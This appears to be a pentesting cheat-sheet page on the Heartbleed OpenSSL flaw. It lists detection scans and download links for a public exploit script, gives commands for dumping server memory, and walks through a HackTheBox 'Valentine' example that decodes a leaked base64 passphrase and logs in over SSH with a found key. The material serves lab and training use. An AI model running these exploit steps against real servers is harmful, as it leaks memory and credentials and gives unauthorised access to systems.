heartbleed

Last updated 2 years ago

Was this helpful?

heartbleed

Basics

Vulnerability in the popular OpenSSL cryptographic software library.
Allows anyone to read the memory of the systems protected by this vulnerable OpenSSL version.
Grabs a memory dump - Might find all kinds of goodies!!
"How the heartbleed bug works"
- Meg: Server are you still there? if so reply 'HAT' with 500 letters

Detection

> nmap --script vuln $IP
> sslyze --heartbleed $IP

Exploit

google: python heartbleed github

-----------
Download
https://gist.github.com/eelsivart/10174134#file-heartbleed-py-L8
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
git clone https://gist.github.com/10174134.git

-----------
searchsploit -w heartbleed
https://exploit-db.com/exploits/32764

-----------
python heartbleed.py
python heartbleed.py -p 443 -n 10 $IP
./heartbleed.py $IP -n 500 -a output.txt    ..winner

-n 500  ..Number of times to connect/loop (1 = default)
-a output.txt

grep '=' output.txt
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==   ..valentineHTB

Example

valentineHTB - had a ssh key password entered on 'decode.php'
hype_key was hidden somewhere else on the site :)
We can grab the memory, decode the key, and ssh to the box

-----------
decode.php
aGVhcnxyz==                        ..found

-----------
echo 'aGVhcnxyz==' | base64 -d     ..mysecretkey
ssh -i hype_key hype@$IP           ..connect

PreviousFTP NextMetasploit

Last updated 2 years ago

Was this helpful?